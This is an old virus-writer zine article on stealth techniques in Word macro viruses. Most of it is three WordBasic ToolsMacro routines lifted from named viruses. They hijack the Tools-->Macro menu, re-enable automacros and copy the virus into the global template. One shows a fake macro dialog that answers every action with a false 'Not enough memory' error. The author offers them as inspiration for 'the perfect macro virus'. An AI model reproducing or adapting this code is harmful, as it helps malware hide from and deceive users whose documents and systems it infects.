SLAM.005: Different stealth techniques in macro virii
DIFFERENT STEALTH TECHNIQUES IN MACRO VIRII
I wasn't planning to make something real big from this so it's probably a bit short. You'll get a few examples but that's it.
Most of the time the macros that take care of the stealth technique are named ToolsMacro (In the English version of Word) because if it's put in ToolsMacro it's automatically executed when the user selects Tools-->Macro from the menu.
Here are a couple examples:
-----------------------------------------------------------
Sub MAIN
On Error Goto ErrorRoutine
OldName$ = NomFichier$()
If macros.bDebug Then
MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro
If macros.bDebug Then MsgBox "1"
GetCurValues dlg
If macros.bDebug Then MsgBox "2"
On Error Goto Skip
Dialog dlg
OutilsMacro dlg
Skip:
On Error Goto ErrorRoutine
End If
REM enable automacros
DisableAutoMacros 0
macros.SavToGlobal(OldName$)
macros.objectiv
Goto Done
ErrorRoutine:
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If
Done:
End Sub
-----------------------------------------------------------
This one is from 'the macro virus writing tutorial' from Dark Night.
Or you could use:
-----------------------------------------------------------
Sub MAIN
Dim dlg As OutilsMacro
GetCurValues dlg
On Error Resume Next
Diag$ = "0"
Section$ = "Compatibility"
wininistr$ = "0x0020401"
ProfileName$ = "RR2CD"
PrintText$ = "Brought to you by the Nemesis Corporation, 1996"
Password$ = Chr$(120) + Chr$(101) + Chr$(110) + Chr$(105) + Chr$(120) + Chr$(111) + Chr$(115)
NoVir$ = GetProfileString$(Section$, ProfileName$)
If (NoVir$ = wininistr$) Or (diag$ = "1") Then
Dialog dlg
OutilsMacro dlg
Else
MsgBox "This option is not available right now.", "Warning", 48
End If
End Sub
-----------------------------------------------------------
This one is from the Nemesis (Xenixos) virus. I've changed it a bit.
And finally to give another example, from the MooNRaiDer virus.
-----------------------------------------------------------
Sub MAIN
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot"
Begin Dialog UserDialog 442, 320, "Macro"
PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
CancelButton 290, 43, 141, 21
PushButton 290, 72, 141, 21, "&Run", .Definierbar3
PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .Text1
Text 7, 259, 109, 13, "Descr&iption:", .Text2
Text 7, 6, 93, 13, "Macros:", .Text3
ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Cancel
Case 1
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 2
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 3
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 4
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 5
MsgBox "Not enough memory", "WordBasic Err = 7"
End Select
End Sub
-----------------------------------------------------------
Ok, I know it isn't anything more then just some stolen macros but maybe you get some inspiration from this and you will end up creating the perfect macro virus, who knows...
--- Neophyte ---
